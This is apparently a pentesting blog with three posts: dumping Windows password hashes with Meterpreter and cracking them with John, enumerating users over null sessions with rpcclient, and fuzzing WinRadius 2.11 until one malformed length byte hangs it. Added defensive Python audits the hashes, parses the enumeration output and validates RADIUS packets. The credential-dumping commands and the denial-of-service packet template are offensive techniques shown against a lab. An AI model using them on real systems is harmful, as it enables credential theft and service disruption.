Cracking Windows Password Hashes with Metasploit and John

August 15th, 2013

The output of Metasploit’s ‘hashdump’ can be fed directly to John the Ripper and cracked with the ‘nt’ or ‘nt2’ format. Let’s assume a running Meterpreter session: after gaining SYSTEM privileges and issuing ‘hashdump’ we obtain a copy of all password hashes on the system (one line per account, in the form user:RID:LM hash:NT hash:::):

meterpreter > getsystem
...got system (via technique 1).
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee1033bf942cfdccbb38ab9f97319d19:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
daves:1105:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
paulp:1106:aad3b435b51404eeaad3b435b51404ee:8fdecf063cdac5d8407c5b1a75826fad:::
davem:1107:aad3b435b51404eeaad3b435b51404ee:ef00760ac292f0e8da9ca1850ee5be2f:::
office1:1108:aad3b435b51404eeaad3b435b51404ee:5052340fe27eb55317e38a7876480b18:::
office2:1109:aad3b435b51404eeaad3b435b51404ee:ad0c54ced11a55168eef0429775b1f7e:::
admin:1110:aad3b435b51404eeaad3b435b51404ee:d22d7dfc2fb717d7663b47131b1e2347:::
muser1:1111:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
muser2:1112:aad3b435b51404eeaad3b435b51404ee:b180be38c6c29a74431c966e57e4a7d8:::
muser3:1113:aad3b435b51404eeaad3b435b51404ee:e50be861156e77e57e7247b3edc1d9b6:::
muser4:1114:aad3b435b51404eeaad3b435b51404ee:a2d639861ee3a2566259796b85a08bc9:::
muser5:1116:aad3b435b51404eeaad3b435b51404ee:8fb609d78209fd8e0b91bff896a73eca:::
mike:1117:aad3b435b51404eeaad3b435b51404ee:cf9d1a4a87ab69e06d014e9c06910946:::

Now we run John:

john ./pwlist.txt --format=nt --wordlist=/pentest/passwords/wordlists/rockyou.txt
Loaded 13 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
                 (Guest)
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably

Unfortunately, we could only ‘crack’ the Guest account with its blank password, which won’t be much use. Better luck next time, or try a bigger wordlist!
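Before (or instead of) throwing a wordlist at a dump like this, the hash values themselves already give a password-hygiene picture. The Python below is an added example, not part of the original post: it parses pwdump-format lines, flags accounts whose NT field is the well-known empty-password hash (which is all John found, for Guest), accounts that still store an LM hash, and accounts that share an NT hash, which means they share a password because NT hashes are unsalted. The sample input is the dump from the post; the two constant hashes are the public empty-LM and empty-NT values, not secrets. Note that the dump has 14 lines while John reported 13 hashes loaded: daves and muser1 have identical NT hashes, and John de-duplicates on load.

```python
import re
from collections import defaultdict

# Constructed sample input: the hashdump lines from the post above.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee1033bf942cfdccbb38ab9f97319d19:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
daves:1105:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
paulp:1106:aad3b435b51404eeaad3b435b51404ee:8fdecf063cdac5d8407c5b1a75826fad:::
davem:1107:aad3b435b51404eeaad3b435b51404ee:ef00760ac292f0e8da9ca1850ee5be2f:::
office1:1108:aad3b435b51404eeaad3b435b51404ee:5052340fe27eb55317e38a7876480b18:::
office2:1109:aad3b435b51404eeaad3b435b51404ee:ad0c54ced11a55168eef0429775b1f7e:::
admin:1110:aad3b435b51404eeaad3b435b51404ee:d22d7dfc2fb717d7663b47131b1e2347:::
muser1:1111:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
muser2:1112:aad3b435b51404eeaad3b435b51404ee:b180be38c6c29a74431c966e57e4a7d8:::
muser3:1113:aad3b435b51404eeaad3b435b51404ee:e50be861156e77e57e7247b3edc1d9b6:::
muser4:1114:aad3b435b51404eeaad3b435b51404ee:a2d639861ee3a2566259796b85a08bc9:::
muser5:1116:aad3b435b51404eeaad3b435b51404ee:8fb609d78209fd8e0b91bff896a73eca:::
mike:1117:aad3b435b51404eeaad3b435b51404ee:cf9d1a4a87ab69e06d014e9c06910946:::
"""

# Public constants, not secrets: the LM field holds EMPTY_LM when no LM hash is
# stored for the account, and the NT field holds EMPTY_NT for an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump format: user:RID:LM:NT::: (LM and NT are 32 hex digits each)
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_hashdump(text):
    """Parse pwdump-format lines into a list of account records."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised hashdump line: {line!r}")
        records.append({"user": m["user"], "rid": int(m["rid"]),
                        "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return records


def audit(records):
    """Report blank passwords, stored LM hashes, shared passwords and the RID-500 account."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    return {
        "accounts": len(records),
        "unique_nt_hashes": len(by_nt),  # what John reports as "Loaded N password hashes"
        "blank_password": [r["user"] for r in records if r["nt"] == EMPTY_NT],
        "lm_hash_stored": [r["user"] for r in records if r["lm"] != EMPTY_LM],
        # identical unsalted NT hashes mean identical passwords
        "shared_password": {h: u for h, u in by_nt.items() if len(u) > 1 and h != EMPTY_NT},
        "builtin_admin": [r["user"] for r in records if r["rid"] == 500],
    }


if __name__ == "__main__":
    for key, value in audit(parse_hashdump(HASHDUMP)).items():
        print(f"{key}: {value}")
```

The shared-password check is the finding the wordlist run above never surfaces: daves and muser1 use the same password, so a reset for one of them should cover both.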

Windows Null Session Enumeration

August 10th, 2013

Null sessions are a ‘feature’ of Windows that lets an anonymous user connect to the IPC$ share and enumerate certain information. We can connect to one from Windows with the commands:

net use \\IP_ADDRESS\ipc$ "" /user:"" 
net use

or from Linux with:

rpcclient -U "" IP_ADDRESS

Once connected and at the “rpcclient $>” prompt, we can issue ‘?’ to list the supported commands. The most interesting are ‘enumdomusers’, ‘netshareenum’, ‘netshareenumall’ and ‘querydominfo’. Here’s the output against a sample lab machine:

rpcclient $> enumdomusers
cli_pipe_validate_current_pdu: RPC fault code DCERPC_FAULT_OP_RNG_ERROR received from host 192.168.1.20!
user:[admin] rid:[0x3ef]
user:[Administrator] rid:[0x1f4]
user:[npn] rid:[0x3f0]
user:[Guest] rid:[0x1f5]

rpcclient $> querydominfo
cli_pipe_validate_current_pdu: RPC fault code DCERPC_FAULT_OP_RNG_ERROR received from host 192.168.1.20!
Domain:		WINSRV
Server:		
Comment:	
Total Users:	13
Total Groups:	1
Total Aliases:	0
Sequence No:	899
Force Logoff:	-1
Domain Server State:	0x1
Server Role:	ROLE_DOMAIN_PDC
Unknown 3:	0x1
rpcclient $> 
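When going through output from a session like this, it helps to turn it into structured findings rather than reading it by eye. The Python below is an added example, not part of the original post: it parses the `user:[...] rid:[...]` lines and the key/value lines from querydominfo, converts RIDs to decimal so that the built-in Administrator (RID 500) and Guest (RID 501) are recognised regardless of what they have been renamed to, records the RPC fault lines, and compares the number of users actually enumerated with the domain’s reported Total Users. The sample input is the session above; the small well-known-RID table is standard Windows knowledge.

```python
import re

# Constructed sample input: the rpcclient session from the post above
# (the querydominfo lines are tab-separated, as rpcclient prints them).
RPCCLIENT_OUTPUT = """\
rpcclient $> enumdomusers
cli_pipe_validate_current_pdu: RPC fault code DCERPC_FAULT_OP_RNG_ERROR received from host 192.168.1.20!
user:[admin] rid:[0x3ef]
user:[Administrator] rid:[0x1f4]
user:[npn] rid:[0x3f0]
user:[Guest] rid:[0x1f5]

rpcclient $> querydominfo
cli_pipe_validate_current_pdu: RPC fault code DCERPC_FAULT_OP_RNG_ERROR received from host 192.168.1.20!
Domain:\t\tWINSRV
Server:\t\t
Comment:\t
Total Users:\t13
Total Groups:\t1
Total Aliases:\t0
Sequence No:\t899
Force Logoff:\t-1
Domain Server State:\t0x1
Server Role:\tROLE_DOMAIN_PDC
Unknown 3:\t0x1
rpcclient $> 
"""

USER_RE = re.compile(r"^user:\[(?P<name>[^\]]*)\] rid:\[0x(?P<rid>[0-9a-fA-F]+)\]$")
INFO_RE = re.compile(r"^(?P<key>[A-Za-z0-9 ]+):\t+(?P<value>.*)$")
FAULT_RE = re.compile(r"RPC fault code (?P<code>\S+) received from host (?P<host>\S+)!")

# Fixed RIDs of built-in accounts; the name can be changed, the RID cannot.
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest", 502: "krbtgt"}


def parse_session(text):
    """Split an rpcclient transcript into users, domain info and RPC faults."""
    users, info, faults = [], {}, []
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            users.append((m["name"], int(m["rid"], 16)))
            continue
        m = FAULT_RE.search(line)
        if m:
            faults.append((m["code"], m["host"]))
            continue
        m = INFO_RE.match(line)
        if m:
            info[m["key"]] = m["value"].strip()
    return {"users": users, "info": info, "faults": faults}


def review(session):
    """Produce the points a reviewer would want from the parsed session."""
    info, users = session["info"], session["users"]
    total = info.get("Total Users", "")
    reported = int(total) if total.isdigit() else None
    return {
        "domain": info.get("Domain"),
        "role": info.get("Server Role"),
        "enumerated_users": len(users),
        "reported_total_users": reported,
        # fewer users listed than the domain reports: do not treat the list as complete
        "user_count_mismatch": reported is not None and len(users) != reported,
        "well_known": {n: WELL_KNOWN_RIDS[r] for n, r in users if r in WELL_KNOWN_RIDS},
        "renamed_builtins": [n for n, r in users
                             if (r == 500 and n != "Administrator") or (r == 501 and n != "Guest")],
        "faults": sorted(set(session["faults"])),
    }


if __name__ == "__main__":
    for key, value in review(parse_session(RPCCLIENT_OUTPUT)).items():
        print(f"{key}: {value}")
```

Two things the raw output hides: ‘admin’ (RID 0x3ef = 1007) is an ordinary account rather than a renamed built-in Administrator, and only 4 of the 13 users the domain reports were listed, so the enumeration should not be assumed complete. On the server side, whether an anonymous session can enumerate accounts at all is governed by the LSA RestrictAnonymous and RestrictAnonymousSAM settings.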


Fuzz to Denial of Service: WinRadius 2.11

June 10th, 2013

I set some time aside to test WinRadius yesterday. Fuzzing was done manually and with a Python script. I didn’t spend too much time on it, but I’m confident that there’s a remote code execution opportunity here. If no one else gets there first, I’ll revisit it in a few weeks.

Firstly, to make sure our setup works and to capture a packet, we can use ‘radclient’. I set up a user account adam/adam for testing and then tried to authenticate:

[Figure: Radius Client Test] radclient will form a RADIUS request from our STDIN data.

[Figure: Wireshark Capture] We capture the packet we sent and the response.

[Figure: WinRadius 2.11]

And we confirm that WinRadius received and accepted the request. Once this was done, we needed to create a template in Python, which we did as follows:

#!/usr/bin/env python3

import socket

# Access-Request template copied from the radclient capture, as Python 3 bytes.

pwn =  b"\x01"  # Code 1 = Access-Request
pwn += b"\xff"  # packet identifier
pwn += b"\x00\x2c"  # length 44 (20-byte header + 6 + 18 attribute bytes)
pwn += b"\xd1\x56\x8a\x38\xfb\xea\x4a\x40\xb7\x8a\xa2\x7a\x8f\x3e\xae\x23"  # request authenticator
pwn += b"\x01"  # attribute type 1 = User-Name
pwn += b"\x06"  # attribute length 6 (type + length + 4 value bytes)
pwn += b"\x61\x64\x61\x6d"  # "adam"

pwn += b"\x02"  # attribute type 2 = User-Password
pwn += b"\x12"  # attribute length 18 (type + length + 16 value bytes)
pwn += b"\xf0\x13\x57\x7e\x48\x1e\x55\xaa\x7d\x29\x6d\x7a\x88\x18\x89\x21"  # password, obfuscated with the shared secret

address = ('192.168.200.20', 1812)  # WinRadius lab host, authentication port
server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

server_socket.sendto(pwn, address)

We can now replay this packet at will and confirm through Wireshark and WinRadius that all is well and we are being authenticated. The next challenge was to start manually mangling data. After about 15 minutes of trial and error, I found that changing line 16 from \x12 to \xff caused the application to consume all available CPU and hang indefinitely. I couldn’t cause a crash, although with a bit more trial and error, and trying different RADIUS requests such as accounting start/stop, I’d be surprised if there wasn’t an RCE somewhere here.

[Figure: WinRadius DoS Code]

[Figure: WinRadius Crash]

The application now hangs.
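The hang came from a single attribute length byte, which points at what a RADIUS listener has to verify before trusting anything in a datagram. The parser below is an added example, not the post’s code and not WinRadius: it checks an incoming packet against the RFC 2865 framing rules (header Length between 20 and 4096 and no larger than the datagram, every attribute Length at least 2 and ending within the packet) and discards anything that fails, so a bad length can neither run the reader past the end of the buffer nor stall the attribute loop. The sample input is the Access-Request bytes from the template above, plus a copy with the User-Password length byte (script line 16, packet offset 27) set to 0xff as described.

```python
import struct

HEADER_LEN = 20   # Code(1) + Identifier(1) + Length(2) + Authenticator(16)
MAX_LEN = 4096    # RFC 2865 section 3: Length is 20..4096

RADIUS_CODES = {1: "Access-Request", 2: "Access-Accept", 3: "Access-Reject",
                4: "Accounting-Request", 5: "Accounting-Response", 11: "Access-Challenge"}

# Constructed sample: the Access-Request bytes from the template above.
ACCESS_REQUEST = bytes.fromhex(
    "01ff002c" "d1568a38fbea4a40b78aa27a8f3eae23"   # code, id, length 44, authenticator
    "0106" "6164616d"                               # User-Name(1), len 6, "adam"
    "0212" "f013577e481e55aa7d296d7a88188921"       # User-Password(2), len 18, 16 bytes
)
# The same packet with the User-Password Length byte (offset 27) set to 0xff.
MUTATED = ACCESS_REQUEST[:27] + b"\xff" + ACCESS_REQUEST[28:]


def parse_radius(pkt):
    """Parse a RADIUS datagram, raising ValueError on any framing violation."""
    if len(pkt) < HEADER_LEN:
        raise ValueError("packet shorter than the 20-byte RADIUS header")
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    authenticator = pkt[4:HEADER_LEN]
    if length < HEADER_LEN or length > MAX_LEN:
        raise ValueError(f"header Length {length} out of range")
    if length > len(pkt):
        raise ValueError(f"header Length {length} exceeds datagram size {len(pkt)}")
    # Octets beyond Length are padding and ignored; only [20, length) holds attributes.
    attrs = []
    off = HEADER_LEN
    while off < length:
        if length - off < 2:
            raise ValueError(f"truncated attribute header at offset {off}")
        atype, alen = pkt[off], pkt[off + 1]
        # Attribute Length counts its own Type and Length octets, so it is never < 2;
        # a value past the end of the packet (0xff here) is exactly the mutated case.
        if alen < 2:
            raise ValueError(f"attribute {atype} Length {alen} < 2 at offset {off}")
        if off + alen > length:
            raise ValueError(f"attribute {atype} Length {alen} overruns packet at offset {off}")
        attrs.append((atype, pkt[off + 2:off + alen]))
        off += alen  # alen >= 2 guarantees forward progress, so the loop always ends
    return {"code": code, "code_name": RADIUS_CODES.get(code, "unknown"), "id": ident,
            "length": length, "authenticator": authenticator, "attrs": attrs}


def safe_parse(pkt):
    """What a server should do with a datagram: (parsed, None) or (None, reason) to drop it."""
    try:
        return parse_radius(pkt), None
    except ValueError as err:
        return None, str(err)


if __name__ == "__main__":
    for label, pkt in (("template", ACCESS_REQUEST), ("mutated", MUTATED)):
        parsed, reason = safe_parse(pkt)
        print(label, "->", parsed["attrs"] if parsed else f"discarded: {reason}")
```

The forward-progress guarantee is the point: with the length check in place, no attribute length the client can choose makes the loop read outside the datagram or fail to advance, so the datagram is dropped in constant time rather than occupying the CPU.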